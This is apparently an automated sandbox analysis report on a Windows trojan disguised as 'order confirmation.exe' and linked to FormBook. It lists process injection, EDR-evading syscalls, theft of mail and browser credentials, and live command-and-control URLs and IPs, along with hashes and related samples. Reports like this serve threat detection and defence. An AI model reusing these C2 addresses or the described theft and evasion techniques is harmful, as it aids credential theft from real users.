                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575107 Sample: order confirmation.exe Startdate: 14/12/2024 Architecture: WINDOWS Score: 100 33 phoenix88.sbs 2->33 35 www.phoenix88.sbs 2->35 37 5 other IPs or domains 2->37 45 Suricata IDS alerts for network traffic 2->45 47 Antivirus detection for URL or domain 2->47 49 Multi AV Scanner detection for submitted file 2->49 51 5 other signatures 2->51 10 order confirmation.exe 3 2->10         started        signatures3 process4 file5 31 C:\Users\user\...\order confirmation.exe.log, ASCII 10->31 dropped 65 Injects a PE file into a foreign processes 10->65 14 order confirmation.exe 10->14         started        17 order confirmation.exe 10->17         started        signatures6 process7 signatures8 67 Maps a DLL or memory area into another process 14->67 19 XDBtzWJieMe.exe 14->19 injected process9 signatures10 53 Found direct / indirect Syscall (likely to bypass EDR) 19->53 22 SearchProtocolHost.exe 13 19->22         started        process11 signatures12 55 Tries to steal Mail credentials (via file / registry access) 22->55 57 Tries to harvest and steal browser information (history, passwords, etc) 22->57 59 Modifies the context of a thread in another process (thread injection) 22->59 61 3 other signatures 22->61 25 XDBtzWJieMe.exe 22->25 injected 29 firefox.exe 22->29         started        process13 dnsIp14 39 phoenix88.sbs 88.99.61.52, 49815, 49821, 49829 HETZNER-ASDE Germany 25->39 41 www.canadavinreport.site 185.27.134.206, 49777, 49785, 49794 WILDCARD-ASWildcardUKLimitedGB United Kingdom 25->41 43 3 other IPs or domains 25->43 63 Found direct / indirect Syscall (likely to bypass EDR) 25->63 signatures15

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                order confirmation.exe63%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                order confirmation.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.phoenix88.sbs/ogj2/?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9T9LUB2i2IiSBd7rmeCdeR22hTga1oxsx30/DDEHjEXz3Vw==&2VqtG=K0rLevU0Wh5tIJEp0%Avira URL Cloudsafe
                http://www.laohub10.net/8s5b/?KX=CIoU3XkQQhyfpcUgpw2pt4D5rFaewhtqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYqRwUDZc0hQ5nlduAuRdjiHqVHSyH0yZGbg1OgG3wMBkWQ==&2VqtG=K0rLevU0Wh5tIJEp0%Avira URL Cloudsafe
                http://www.ana-silverco.shop/eaqq/?KX=NxubQmq32TFwA/AibIzR7zP/ZxBDpVn2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYqX2P65hLvXSZ3fWNCCIV/k5d2IdbBS66sOXN5gLen/wBg==&2VqtG=K0rLevU0Wh5tIJEp0%Avira URL Cloudsafe
                http://www.ana-silverco.shop/eaqq/0%Avira URL Cloudsafe
                http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/ps0%Avira URL Cloudsafe
                http://www.5tuohbpzyj9.buzz/abgi/100%Avira URL Cloudmalware
                http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5100%Avira URL Cloudmalware
                http://www.5tuohbpzyj9.buzz/abgi/?KX=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNtflpkpcb0CVjulSXUCscL7c5c6O3wfheXeqQy3IVMD/Pg==&2VqtG=K0rLevU0Wh5tIJEp100%Avira URL Cloudmalware
                http://www.ana-silverco.shop0%Avira URL Cloudsafe
                http://www.phoenix88.sbs/ogj2/0%Avira URL Cloudsafe
                http://www.canadavinreport.site/4d2l/100%Avira URL Cloudmalware
                http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMZMG6cjSawY9sklYa6FSt3/cXLdoz7lp+06E84XgU+l17w==100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.ana-silverco.shop
                		104.21.90.137
                		truefalse
                  		high
                  r0lqcud7.nbnnn.xyz
                  		27.124.4.246
                  		truefalse
                    		high
                    www.5tuohbpzyj9.buzz
                    		156.232.181.155
                    		truefalse
                      		high
                      www.canadavinreport.site
                      		185.27.134.206
                      		truefalse
                        		high
                        phoenix88.sbs
                        		88.99.61.52
                        		truetrue
                          		unknown
                          www.laohub10.net
                          		unknown
                          		unknownfalse
                            		high
                            www.phoenix88.sbs
                            		unknown
                            		unknownfalse
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.laohub10.net/8s5b/?KX=CIoU3XkQQhyfpcUgpw2pt4D5rFaewhtqHE31gFJTqo9NSkmYuUT5vLSdoQQ8/MieV/ko0R3BDKl76A9J0JdcYqRwUDZc0hQ5nlduAuRdjiHqVHSyH0yZGbg1OgG3wMBkWQ==&2VqtG=K0rLevU0Wh5tIJEptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ana-silverco.shop/eaqq/?KX=NxubQmq32TFwA/AibIzR7zP/ZxBDpVn2yR9uwt+3Cm9QP0jQO/3+sgZCY8NDMJ5UVFnAF2VjMcKsp0wgFy5kYqX2P65hLvXSZ3fWNCCIV/k5d2IdbBS66sOXN5gLen/wBg==&2VqtG=K0rLevU0Wh5tIJEptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.5tuohbpzyj9.buzz/abgi/?KX=LosdeFxQ6b3v/d4SJ/OcJ/MY+PVZKDXZGTDYvYgB3fNn+3JFEAQVpOMVTjnjMG/QWUj2NZ16mgwYZq+Px3flNtflpkpcb0CVjulSXUCscL7c5c6O3wfheXeqQy3IVMD/Pg==&2VqtG=K0rLevU0Wh5tIJEptrue
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.phoenix88.sbs/ogj2/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.ana-silverco.shop/eaqq/true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.phoenix88.sbs/ogj2/?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psKw0iImlr8MkKngr/ag9vs3m2iCqBOJ8/g5hlN9T9LUB2i2IiSBd7rmeCdeR22hTga1oxsx30/DDEHjEXz3Vw==&2VqtG=K0rLevU0Wh5tIJEptrue
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.5tuohbpzyj9.buzz/abgi/true
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.canadavinreport.site/4d2l/true
                              • Avira URL Cloud: malware
                              		unknown
                              http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5+oWd+FfSafw9B5aEbKeI9QaOJyYnHDbUU8zKBdUx5Ha3huju/iS+m/mVqblub+IZMMZMG6cjSawY9sklYa6FSt3/cXLdoz7lp+06E84XgU+l17w==true
                              • Avira URL Cloud: malware
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              https://ac.ecosia.org/autocomplete?q=SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://duckduckgo.com/chrome_newtabSearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://duckduckgo.com/ac/?q=SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://www.google.com/images/branding/product/ico/googleg_lodp.icoSearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchSearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://tempuri.org/kviskotekaDbDataSet.xsdcIgraorder confirmation.exefalse
                                          		high
                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.canadavinreport.site/4d2l/?2VqtG=K0rLevU0Wh5tIJEp&KX=ZGBp9LUVeZbORoknng5SearchProtocolHost.exe, 00000009.00000002.2823206675.0000000004218000.00000004.10000000.00040000.00000000.sdmp, SearchProtocolHost.exe, 00000009.00000002.2825358139.00000000062E0000.00000004.00000800.00020000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000002.2822111339.0000000003188000.00000004.00000001.00040000.00000000.sdmpfalse
                                              • Avira URL Cloud: malware
                                              		unknown
                                              https://www.ecosia.org/newtab/SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.phoenix88.sbs/cgi-sys/suspendedpage.cgi?KX=I9QoqWawalcNSRHc2ItfPod4AkGcs3UgKY9BOPFHD5g/psSearchProtocolHost.exe, 00000009.00000002.2823206675.00000000043AA000.00000004.10000000.00040000.00000000.sdmp, XDBtzWJieMe.exe, 0000000A.00000002.2822111339.000000000331A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=SearchProtocolHost.exe, 00000009.00000003.2183274515.0000000007E58000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.ana-silverco.shopXDBtzWJieMe.exe, 0000000A.00000002.2823935651.0000000004F06000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  World Map of Contacted IPs

                                                  • No. of IPs < 25%
                                                  • 25% < No. of IPs < 50%
                                                  • 50% < No. of IPs < 75%
                                                  • 75% < No. of IPs

                                                  Public IPs

                                                  IPDomainCountryFlagASNASN NameMalicious
                                                  27.124.4.246
                                                  		r0lqcud7.nbnnn.xyzSingapore
                                                  		64050BCPL-SGBGPNETGlobalASNSGfalse
                                                  156.232.181.155
                                                  		www.5tuohbpzyj9.buzzSeychelles
                                                  		134548DXTL-HKDXTLTseungKwanOServiceHKfalse
                                                  88.99.61.52
                                                  		phoenix88.sbsGermany
                                                  		24940HETZNER-ASDEtrue
                                                  185.27.134.206
                                                  		www.canadavinreport.siteUnited Kingdom
                                                  		34119WILDCARD-ASWildcardUKLimitedGBfalse
                                                  104.21.90.137
                                                  		www.ana-silverco.shopUnited States
                                                  		13335CLOUDFLARENETUSfalse

                                                  General Information

                                                  Joe Sandbox version:41.0.0 Charoite
                                                  Analysis ID:1575107
                                                  Start date and time:2024-12-14 13:48:14 +01:00
                                                  Joe Sandbox product:CloudBasic
                                                  Overall analysis duration:0h 9m 29s
                                                  Hypervisor based Inspection enabled:false
                                                  Report type:full
                                                  Cookbook file name:default.jbs
                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                  Number of analysed new started processes analysed:12
                                                  Number of new started drivers analysed:0
                                                  Number of existing processes analysed:0
                                                  Number of existing drivers analysed:0
                                                  Number of injected processes analysed:2
                                                  Technologies:
                                                  • HCA enabled
                                                  • EGA enabled
                                                  • AMSI enabled
                                                  Analysis Mode:default
                                                  Analysis stop reason:Timeout
                                                  Sample name:order confirmation.exe
                                                  Detection:MAL
                                                  Classification:mal100.troj.spyw.evad.winEXE@9/2@7/5
                                                  EGA Information:
                                                  • Successful, ratio: 75%
                                                  HCA Information:
                                                  • Successful, ratio: 91%
                                                  • Number of executed functions: 107
                                                  • Number of non-executed functions: 283
                                                  Cookbook Comments:
                                                  • Found application associated with file extension: .exe

                                                  Warnings

                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                  • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.245.163.56, 20.12.23.50, 13.107.246.63
                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                  • Not all processes where analyzed, report is missing behavior information
                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                  • VT rate limit hit for: order confirmation.exe

                                                  Simulations

                                                  Behavior and APIs

                                                  TimeTypeDescription
                                                  07:49:33API Interceptor1x Sleep call for process: order confirmation.exe modified
                                                  07:50:47API Interceptor1170680x Sleep call for process: SearchProtocolHost.exe modified

                                                  Joe Sandbox View / Context

                                                  IPs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  27.124.4.246PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                  • www.laohub10.net/sgdd/
                                                  Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                  • www.laohub10.net/sgdd/
                                                  BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                  • www.laohub10.net/36be/
                                                  OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                  • www.laohub10.net/sgdd/
                                                  purchase Order.exeGet hashmaliciousFormBookBrowse
                                                  • www.laohub10.net/sgdd/
                                                  RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                  • www.laohub10.net/sgdd/
                                                  156.232.181.155UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                  • www.5tuohbpzyj9.buzz/abgi/
                                                  quotation.exeGet hashmaliciousFormBookBrowse
                                                  • www.5tuohbpzyj9.buzz/abgi/
                                                  specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.5tuohbpzyj9.buzz/abgi/
                                                  ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.5tuohbpzyj9.buzz/abgi/
                                                  PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                  • www.5tuohbpzyj9.buzz/c6yl/
                                                  88.99.61.52UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                  • www.phoenix88.sbs/ogj2/
                                                  quotation.exeGet hashmaliciousFormBookBrowse
                                                  • www.phoenix88.sbs/ogj2/
                                                  ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.phoenix88.sbs/ogj2/
                                                  185.27.134.206UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                  • www.canadavinreport.site/4d2l/
                                                  quotation.exeGet hashmaliciousFormBookBrowse
                                                  • www.canadavinreport.site/4d2l/
                                                  YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                  • www.canadavinreport.site/g3h7/
                                                  Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                  • www.canadavinreport.site/vvzz/
                                                  BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                  • www.canadavinreport.site/g3h7/
                                                  specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.canadavinreport.site/4d2l/
                                                  ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.canadavinreport.site/4d2l/
                                                  W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.canadavinreport.site/cvhb/
                                                  IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • www.canadavinreport.site/vvzz/
                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                  • www.canadavinreport.site/cvhb/

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  r0lqcud7.nbnnn.xyzUPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                  • 23.225.159.42
                                                  PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                  • 27.124.4.246
                                                  Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                  • 27.124.4.246
                                                  Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                  • 23.225.159.42
                                                  quotation.exeGet hashmaliciousFormBookBrowse
                                                  • 27.124.4.246
                                                  YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                  • 23.225.159.42
                                                  Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                  • 202.79.161.151
                                                  lKvXJ7VVCK.exeGet hashmaliciousFormBookBrowse
                                                  • 23.225.159.42
                                                  BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                  • 27.124.4.246
                                                  specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 23.225.159.42
                                                  www.5tuohbpzyj9.buzzUPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                  • 156.232.181.155
                                                  quotation.exeGet hashmaliciousFormBookBrowse
                                                  • 156.232.181.155
                                                  specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 156.232.181.155
                                                  ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 156.232.181.155
                                                  PO-DC13112024_pdf.vbsGet hashmaliciousUnknownBrowse
                                                  • 156.232.181.155
                                                  www.canadavinreport.siteUPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                  • 185.27.134.206
                                                  quotation.exeGet hashmaliciousFormBookBrowse
                                                  • 185.27.134.206
                                                  YH-3-12-2024-GDL Units - Projects.exeGet hashmaliciousFormBookBrowse
                                                  • 185.27.134.206
                                                  Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                  • 185.27.134.206
                                                  BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                  • 185.27.134.206
                                                  specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 185.27.134.206
                                                  ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 185.27.134.206
                                                  W3MzrFzSF0.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 185.27.134.206
                                                  IETC-24017.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 185.27.134.206
                                                  Quotation.exeGet hashmaliciousFormBookBrowse
                                                  • 185.27.134.206
                                                  www.ana-silverco.shopDHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                  • 104.21.90.137
                                                  UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                  • 172.67.156.195
                                                  SW_5724.exeGet hashmaliciousFormBookBrowse
                                                  • 172.67.156.195
                                                  quotation.exeGet hashmaliciousFormBookBrowse
                                                  • 104.21.90.137
                                                  specifications.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 104.21.90.137
                                                  ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 104.21.90.137

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  BCPL-SGBGPNETGlobalASNSGL4rN4tX0aH.exeGet hashmaliciousFormBookBrowse
                                                  • 137.220.183.235
                                                  PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                  • 27.124.4.246
                                                  Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                  • 27.124.4.246
                                                  72STaC6BmljfbIQ.exeGet hashmaliciousFormBookBrowse
                                                  • 134.122.191.187
                                                  quotation.exeGet hashmaliciousFormBookBrowse
                                                  • 27.124.4.246
                                                  Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                  • 202.79.161.151
                                                  BASF Hung#U00e1ria Kft.exeGet hashmaliciousFormBookBrowse
                                                  • 27.124.4.246
                                                  OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                  • 202.79.161.151
                                                  arm5.elfGet hashmaliciousUnknownBrowse
                                                  • 180.215.169.147
                                                  ARRIVAL NOTICE.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                  • 202.79.161.151
                                                  DXTL-HKDXTLTseungKwanOServiceHKsh4.elfGet hashmaliciousMiraiBrowse
                                                  • 156.235.189.159
                                                  x86.elfGet hashmaliciousMiraiBrowse
                                                  • 156.235.242.44
                                                  nshkarm7.elfGet hashmaliciousMiraiBrowse
                                                  • 156.235.189.172
                                                  hax.x86.elfGet hashmaliciousMiraiBrowse
                                                  • 156.235.217.38
                                                  hax.mpsl.elfGet hashmaliciousMiraiBrowse
                                                  • 122.10.72.123
                                                  hax.arm.elfGet hashmaliciousMiraiBrowse
                                                  • 156.235.217.25
                                                  arm5-20241210-1051.elfGet hashmaliciousMiraiBrowse
                                                  • 156.235.189.149
                                                  arm7-20241210-1051.elfGet hashmaliciousMiraiBrowse
                                                  • 156.235.189.191
                                                  arm.elfGet hashmaliciousMiraiBrowse
                                                  • 156.235.189.161
                                                  Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                  • 45.203.83.137
                                                  HETZNER-ASDEfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, VidarBrowse
                                                  • 116.203.10.31
                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                  • 116.203.10.31
                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                  • 116.203.10.31
                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                  • 116.203.10.31
                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                  • 116.203.10.31
                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                  • 116.203.10.31
                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                                  • 116.203.10.31
                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                  • 116.203.10.31
                                                  file.exeGet hashmaliciousAmadeyBrowse
                                                  • 116.203.10.31
                                                  SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                  • 144.76.190.39

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\order confirmation.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\order confirmation.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1216
                                                  Entropy (8bit):5.34331486778365
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                  MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                  SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                  SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                  SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                  Malicious:true
                                                  Reputation:high, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                  C:\Users\user\AppData\Local\Temp\sE716IK71M

                                                  Download File
                                                  Process:C:\Windows\SysWOW64\SearchProtocolHost.exe
                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                  Category:dropped
                                                  Size (bytes):196608
                                                  Entropy (8bit):1.1209886597424439
                                                  Encrypted:false
                                                  SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
                                                  MD5:EFD26666EAE0E87B32082FF52F9F4C5E
                                                  SHA1:603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
                                                  SHA-256:67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
                                                  SHA-512:28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                  Static File Info

                                                  General

                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):7.717628741116791
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                  • Win32 Executable (generic) a (10002005/4) 49.75%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Windows Screen Saver (13104/52) 0.07%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  File name:order confirmation.exe
                                                  File size:835'584 bytes
                                                  MD5:8d4459233467bbcf973541c6b17091d7
                                                  SHA1:e1a6e0be6aa2e7aa77c9f5f3c394d62c749c2b06
                                                  SHA256:1bd11bb8886ef9aaaa8a59425f2fce8517a476dcb328751f8c39512cf719f2da
                                                  SHA512:07399bbe3fdb7419a2e31895ecd758e69745076eaaf020cb684d48f36c0abe51a550ec315e76c749b20224aab5886a30f82239e0abbbd2842a9431df38176d77
                                                  SSDEEP:12288:5C25usx+XtKNOWVJcKTNv4qMqHnDdtbW9DZhxprNSvwwJWak:rxN1VJHNAqMqHbWZhHOwwEa
                                                  TLSH:8305F00136699807D6B64BF14A31F2B41BB87DEEB921D2D64ED56DCFB8E5F001A81323
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...V/Mg..............0...... ........... ........@.. ....................................@................................

                                                  File Icon

                                                  Icon Hash:5ba4a66a2a263095

                                                  Static PE Info

                                                  General

                                                  Entrypoint:0x4cbd92
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x674D2F56 [Mon Dec 2 03:53:58 2024 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                  Entrypoint Preview

                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
